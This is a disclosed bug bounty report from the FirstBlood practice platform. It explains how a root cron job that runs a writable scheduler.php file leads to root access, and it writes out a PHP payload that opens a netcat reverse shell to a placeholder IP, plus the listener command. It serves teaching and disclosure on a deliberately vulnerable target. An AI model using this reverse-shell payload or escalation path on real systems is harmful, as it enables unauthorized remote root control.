Root access on the web server

FirstBlood-#681 — Root access on the web server
This issue was discovered on FirstBlood v2

This report has been reviewed and accepted as a valid vulnerability on FirstBlood!

On 2021-10-27, shivam18u Level 3 reported:


Hi sean, 
I found a way to get root access of the server.
I have mentioned the steps to get RCE with fb-exec account access. With that access we can further get root access. 
https://www.bugbountyhunter.com/hackevents/report?id=633
After getting the fb-exec access, you can see the /app/docker/crontab file. 

The crontab runs the scheduler.php file with root access every minute. 
So, if we edit the scheduler.php file, we can get reverse shell to our vps.

We can echo the php code with system function to run the required command in scheduler.php. 
echo '<?php system("nc IP ADDRESS -e /bin/sh");?>' > scheduler.php

After editing the file, start a listener on your vps. 
nc -nvlp 7070
You will get a connection within a minute. You can check the user. 

Have a nice day!!

This report has been publicly disclosed for everyone to view

P1 CRITICAL

Endpoint: .

Parameter: .

Payload: .

FirstBlood ID: 35
Vulnerability Type: RCE

A cronjob is set to execute the file /app/firstblood/scheduler.php every minute under the root user. This file is writable by the firstblood php pool user (fb-exec). The [checkproof bug] can be combined with this to obtain root privileges.

BugBountyHunter